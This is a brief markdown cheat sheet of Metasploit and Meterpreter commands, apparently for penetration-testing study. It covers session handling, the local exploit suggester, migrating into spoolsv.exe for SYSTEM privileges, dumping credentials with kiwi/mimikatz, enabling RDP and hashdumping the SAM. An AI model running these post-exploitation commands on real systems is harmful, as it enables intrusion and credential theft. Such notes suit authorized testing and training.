# Metasploit * `-j` Run job in background * `sessions -i 1` interactive session 1 ## Meterpreter * [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/) * Upgrade shell ```sh post/multi/manage/shell_to_meterpreter ``` * `execute` command * `search` files * `download` and `upload` files # Metasploit after gaining foothold * Meterpreter shell is opened on target. Run exploit suggester ```sh run post/multi/recon/local_exploit_suggester ``` * Decide on your exploit and `background` the meterpreter. * Use the exploit. ```sh use ``` * Fill options like `session` and run the exploit ### Privilege Escalation on Windows Using Metasploit * Find process with higher privs and migrate to it. Example `spoolsv.exe`. ```sh migrate -N spoolsv.exe ``` * After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds ```sh load kiwi help creds_all ``` * Enable RDP via `run post/windows/manage/enable_rdp` ### Hashdump on Windows * Meterpreter ```sh run post/windows/gather/hashdump ``` ```sh load kiwi lsa_dump_sam ```